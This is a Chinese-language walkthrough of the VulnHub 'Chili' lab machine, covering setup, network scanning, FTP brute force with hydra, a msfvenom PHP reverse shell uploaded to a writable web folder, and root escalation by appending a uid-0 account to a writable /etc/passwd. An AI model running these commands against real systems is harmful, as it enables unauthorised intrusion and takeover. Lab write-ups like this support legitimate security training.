一、環境搭建
1、官網下載連接:https://www.vulnhub.com/entry/chili-1,558/
2、使用VMware Workstation Pro將下載的環境文件導入到虛擬機軟件
3、為了方便練習,將網卡模式修改為橋接模式,啟動即可
二、靶場攻略
1、使用命令:netdiscover -i eth0 -r 10.10.114.0/16,發現靶場的ip
2、收集靶場的端口信息,尋找突破點,使用命令:nmap -sV -A -p- 10.10.114.5
發現開啟的端口有,21、端口
3、訪問http的端口尋找漏洞,首頁只有一個圖片,無其他線索
查看首頁的源碼,發現一部分多余單詞,像是一些名稱
4、使用命令:cewl http://10.10.114.5/ > user.txt,爬取網頁並生成字典,爬取的字符只有首字母大寫的用戶名,自行向里面添加全小寫的字符
5、使用命令:hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -f -V 10.10.114.5 ftp,成功爆破處ftp賬戶密碼
6、使用爆破出的賬號,密碼成功登錄ftp
7、切換到網站目錄,/var/www/html,發現可讀可寫可執行的.nano目錄
8、使用put命令,上傳shell.php文件
使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.114.170 LPORT=2345 R > shell.php,生成php反彈shell腳本
使用put命令,在ftp服務器中,將shell.php上傳到.nano目錄中
使用命令:chmod 777 shell.php,將shell.php賦予執行權限
9、啟動msf,使用payload為之前生成后門所用的payload,之后訪問http://10.10.114.5/.nano/shell.php,順利拿到shell
10、下載輔助提權腳本,腳本下載連接:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
下載之后,將linux下用來搜索掃描輔助提權的腳本,在ftp中,使用put命令上傳到.nano目錄,並賦予執行權限
11、執行linpeas.sh腳本,發現了利用的文件為passwd文件,可寫入
12、passwd 文件有寫入權限,我們可以自己寫一個root權限的空密碼賬號進去,再用passwd寫入密碼來進行提權
使用命令:/usr/bin/perl -le 'print crypt("test","test")',這個命令為使用perl腳本語言,執行crypt模塊,將test加密字符串輸出
使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd,在passwd文件中,寫入test賬戶信息
使用命令:su test,輸入密碼test,切換賬戶,成功提權為root
完